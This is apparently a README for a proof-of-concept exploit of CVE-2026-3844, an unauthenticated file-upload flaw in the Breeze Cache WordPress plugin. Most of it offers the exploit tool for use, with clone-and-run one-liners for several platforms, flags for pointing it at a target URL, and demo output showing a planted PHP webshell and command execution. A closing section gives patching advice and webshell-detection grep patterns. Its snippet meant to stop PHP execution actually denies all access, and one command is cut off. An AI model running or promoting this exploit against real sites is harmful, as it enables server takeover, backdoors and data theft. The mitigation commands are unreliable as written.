Share
## https://sploitus.com/exploit?id=9B16EDDF-2582-5419-9AF9-CB671B0E9AB2
# CVE-2026-3844
PoC exploit for CVE-2026-3844, a critical unauthenticated file upload vulnerability in the WordPress Breeze plugin leading to RCE.
[](https://nvd.nist.gov/vuln/detail/CVE-2026-3844)
[](https://nvd.nist.gov/vuln/detail/CVE-2026-3844)
[](https://cwe.mitre.org/data/definitions/434.html)
[](https://python.org)
[](https://wordpress.org/plugins/breeze/)
[](https://github.com/tausifzaman/CVE-2026-3844)
[](https://github.com/tausifzaman/CVE-2026-3844/blob/main/CVE-2026-3844.py)
[](https://tausifzaman.online)
---
## ๐ Overview
**CVE-2026-3844** is a **CRITICAL** unauthenticated arbitrary file upload vulnerability in the **Breeze Cache WordPress plugin** (by Cloudways), affecting **all versions up to and including 2.4.4**.
This repository provides a **Proof of Concept (PoC) exploit** (`CVE-2026-3844.py`) for authorized security research, penetration testing, and responsible disclosure.
---
## One Line Code
```
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3
```
---
## ๐ Vulnerability Summary
| Field | Details |
|------------------------|-------------------------------------------------------------------------|
| **CVE ID** | CVE-2026-3844 |
| **Plugin** | Breeze Cache (by Cloudways) |
| **Affected Versions** | All versions โค 2.4.4 |
| **Patched Version** | Breeze 2.4.5+ |
| **Vulnerability Type** | CWE-434 โ Unrestricted Upload of File with Dangerous Type |
| **CVSS v3.1 Score** | **9.8 (CRITICAL)** |
| **CVSS v2.0 Score** | **10.0 (CRITICAL)** |
| **CVSS Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **Attack Vector** | Network (Remote) |
| **Auth Required** | โ None โ Unauthenticated |
| **Condition** | "Host Files Locally โ Gravatars" must be enabled (disabled by default) |
| **Impact** | Confidentiality: HIGH ยท Integrity: HIGH ยท Availability: HIGH |
| **Published** | 2026-04-23 |
| **Source** | Wordfence / NVD / MITRE |
| **PoC** | [Tausif Zaman](https://tausifzaman.online) |
---
## ๐ Vulnerability Details
### Root Cause
The **Breeze Cache** plugin for WordPress fetches remote Gravatar images and stores them locally when the **"Host Files Locally โ Gravatars"** feature is enabled. The vulnerable function `fetch_gravatar_from_remote` in `class-breeze-cache-cronjobs.php` (lines 89โ119) performs **no file type or extension validation** on the fetched remote content.
```
class-breeze-cache-cronjobs.php
โโโ fetch_gravatar_from_remote() โ โ No file type validation
โโโ Saves remote content directly to disk
โโโ Attacker controls โ uploads .php webshell โ RCE
```
### Attack Flow
```
Attacker (Unauthenticated)
โ
โผ
Craft malicious HTTP request with PHP webshell URL as Gravatar
โ
โผ
Plugin fetches & saves the .php file without validation
โ
โผ
Webshell stored on server (e.g., /wp-content/breeze-cache/evil.php)
โ
โผ
Attacker accesses webshell โ Full RCE achieved
```
### Impact
If successfully exploited, an attacker can:
- ๐ด Execute arbitrary operating system commands (RCE)
- ๐ด Upload persistent backdoors / webshells
- ๐ด Create rogue WordPress administrator accounts
- ๐ด Exfiltrate databases, credentials, and sensitive files
- ๐ด Deface the website or delete all content
- ๐ด Use the server to pivot to other systems on the same network
- ๐ด Recruit the server into a botnet
---
## โ๏ธ Requirements
- Python 3.6+
- `requests` library
- Target site running **Breeze Cache โค 2.4.4** with **"Host Files Locally โ Gravatars" enabled**
---
## ๐ Installation & Setup
### ๐ง Linux / Termux (Android)
```bash
# Clone the repository
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3 CVE-2026-3844.py
# Navigate into the directory
cd CVE-2026-3844
# Install dependencies
pip install -r requirements.txt
# Run the exploit
python3 CVE-2026-3844.py
```
### ๐ช Windows (CMD / PowerShell)
```cmd
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip install -r requirements.txt
python CVE-2026-3844.py
```
### ๐ macOS
```bash
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip3 install -r requirements.txt
python3 CVE-2026-3844.py
```
### ๐ค Termux (One-Liner)
```bash
pkg install python git -y && git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py
```
### โ๏ธ Google Cloud Shell (No Setup Needed)
[](https://console.cloud.google.com/cloudshell/editor?project=&pli=1&shellonly=true)
```bash
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py
```
---
## ๐ป Usage
```bash
python3 CVE-2026-3844.py
```
### Options
```
usage: CVE-2026-3844.py [-h] -u URL [-t TIMEOUT] [-o OUTPUT] [-v]
CVE-2026-3844 โ Breeze Cache WordPress Plugin Arbitrary File Upload PoC
optional arguments:
-h, --help Show this help message and exit
-u URL, --url URL Target URL (e.g. https://target.com)
-t TIMEOUT Request timeout in seconds (default: 10)
-o OUTPUT Save webshell path to output file
-v, --verbose Enable verbose/debug output
```
### Examples
```bash
# Basic usage
python3 CVE-2026-3844.py -u https://vulnerable-site.com
# Verbose mode
python3 CVE-2026-3844.py -u https://vulnerable-site.com -v
# Custom timeout
python3 CVE-2026-3844.py -u https://vulnerable-site.com -t 20 -v
```
---
## ๐ฅ๏ธ PoC Demo Output
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE-2026-3844 | Breeze Cache WP RCE โ
โ Researcher: tausifzaman.online โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[*] Target : https://vulnerable-site.com
[*] CVE : CVE-2026-3844
[*] Plugin : Breeze Cache โค 2.4.4
[*] Type : Unauthenticated Arbitrary File Upload โ RCE
[*] Checking target...
[+] Breeze Cache plugin detected!
[+] "Host Files Locally โ Gravatars" is ENABLED
[*] Uploading PHP webshell via fetch_gravatar_from_remote...
[+] File uploaded successfully!
[+] Webshell path: /wp-content/breeze-cache/avatar_a1b2c3.php
[*] Verifying RCE...
[+] RCE CONFIRMED!
[+] Command output (id):
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Full server compromise achieved.
[*] Cleanup: Remove /wp-content/breeze-cache/avatar_a1b2c3.php after testing.
```
---
## ๐ Mitigation & Remediation
### โ
Immediate Action
> **Update Breeze Cache to version 2.4.5 or later** โ this is the only complete fix.
```bash
# WordPress CLI โ update Breeze plugin immediately
wp plugin update breeze
```
### ๐ก๏ธ Temporary Mitigations (If You Cannot Update Immediately)
1. **Disable** the "Host Files Locally โ Gravatars" option in Breeze Cache settings
2. **Block the vulnerable endpoint** via WAF rule or `.htaccess`
3. **Deny PHP execution** in the uploads and cache directories:
```apache
# Add to /wp-content/uploads/.htaccess and /wp-content/cache/.htaccess
deny from all
```
4. **Scan for newly created/modified suspicious files:**
```bash
# Find recently modified PHP files in wp-content (possible webshells)
find /var/www/html/wp-content -name "*.php" -newer /var/www/html/wp-config.php -ls
# Search for common webshell indicators
grep -r "eval(base64_decode" /var/www/html/wp-content/
grep -r "system\|exec\|passthru\|shell_exec" /var/www/html/wp-content/cache/
```
5. **Block suspicious POST requests** targeting the Gravatar fetch functionality via your WAF
6. **Monitor access logs** for requests to `/wp-content/breeze-cache/*.php`
```bash
# Monitor Apache/Nginx access logs for webshell hits
grep "breeze-cache.*\.php" /var/log/apache2/access.log
grep "breeze-cache.*\.php" /var/log/nginx/access.log
```
### ๐ Check If Already Compromised
```bash
# Check for unexpected PHP files in Breeze cache directory
find /var/www/html/wp-content/breeze-cache/ -name "*.php"
# Check for recently created files (last 7 days)
find /var/www/html/wp-content/ -name "*.php" -mtime -7
# Look for admin accounts created recently (run in wp-mysql)
SELECT user_login, user_registered FROM wp_users ORDER BY user_registered DESC LIMIT 10;
```
---
## ๐ References
| Source | Link |
|--------|------|
| ๐ NVD (NIST) | [nvd.nist.gov/vuln/detail/CVE-2026-3844](https://nvd.nist.gov/vuln/detail/CVE-2026-3844) |
| ๐ MITRE CVE | [cve.mitre.org โ CVE-2026-3844](https://vulners.com/cve/CVE-2026-3844) |
| ๐ Wordfence Advisory | [wordfence.com โ Threat Intel](https://www.wordfence.com/threat-intel/vulnerabilities/id/e342b1c0-6e7f-4e2c-8a52-018df12c12a0?source=cve) |
| ๐ WordPress Plugin Changelog | [plugins.trac.wordpress.org/changeset/3511463/breeze](https://plugins.trac.wordpress.org/changeset/3511463/breeze) |
| ๐ Vulnerable Code (L89) | [class-breeze-cache-cronjobs.php#L89](https://plugins.trac.wordpress.org/browser/breeze/tags/2.4.1/inc/class-breeze-cache-cronjobs.php#L89) |
| ๐ Vulnerable Code (L119) | [class-breeze-cache-cronjobs.php#L119](https://plugins.trac.wordpress.org/browser/breeze/tags/2.4.1/inc/class-breeze-cache-cronjobs.php#L119) |
| ๐ GitHub Advisory | [GHSA-c529-q7mw-hq6j](https://github.com/advisories/GHSA-c529-q7mw-hq6j) |
| ๐ PoC Repository | [github.com/tausifzaman/CVE-2026-3844](https://github.com/tausifzaman/CVE-2026-3844) |
---
## ๐ค Author
**Tausif Zaman**
๐ [tausifzaman.online](https://tausifzaman.online) ยท ๐ [GitHub @tausifzaman](https://github.com/tausifzaman)
*Security Researcher ยท Bug Bounty Hunter ยท Tool Developer*
Android ยท Python ยท PHP ยท Web Security ยท Penetration Testing
---
## โ ๏ธ Legal Disclaimer
This repository and the exploit code within are provided **strictly for educational purposes and authorized security research only**.
- โ
You may use this tool on systems **you own** or have **explicit written permission** to test
- โ Unauthorized use against third-party systems is **illegal** under the Computer Fraud and Abuse Act (CFAA), the Computer Misuse Act, and equivalent laws worldwide
- The author accepts **zero liability** for misuse, damage, or illegal activity resulting from this tool
**Hack ethically. Report responsibly. Stay legal. ๐ก๏ธ**
---
โญ **If this helped your research, star the repo!** โญ
[](https://github.com/tausifzaman/CVE-2026-3844)
[](https://github.com/tausifzaman)
[](https://tausifzaman.online)